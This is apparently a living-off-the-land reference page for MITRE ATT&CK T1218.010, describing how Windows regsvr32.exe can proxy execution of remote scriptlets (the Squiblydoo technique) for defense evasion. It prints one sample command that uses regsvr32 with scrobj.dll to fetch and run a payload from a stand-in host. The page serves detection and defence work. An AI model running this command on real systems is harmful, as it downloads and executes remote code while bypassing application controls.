T1218.010Tactic: Defense EvasionOfficial MITRE ATT&CK Page

T1218.010: Regsvr32

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code via DLLs or scriptlets (Squiblydoo attack).

Total Capable Binaries: 1
Windows: 1
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1218.010

Across 1 verified binaries
Windows1 payloads

regsvr32.exe

Regsvr32 registers and unregisters OLE controls, such as DLLs and ActiveX controls in the Windows Registry. When passed the /i switch pointing to an HTTP/HTTPS URL and scrobj.dll, regsvr32 downloads and executes remote COM scriptlets in memory (the classic Squiblydoo technique).

Sample Attack Vector:
regsvr32.exe /s /n /u /i:http://attack.server/payload.sct scrobj.dll
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point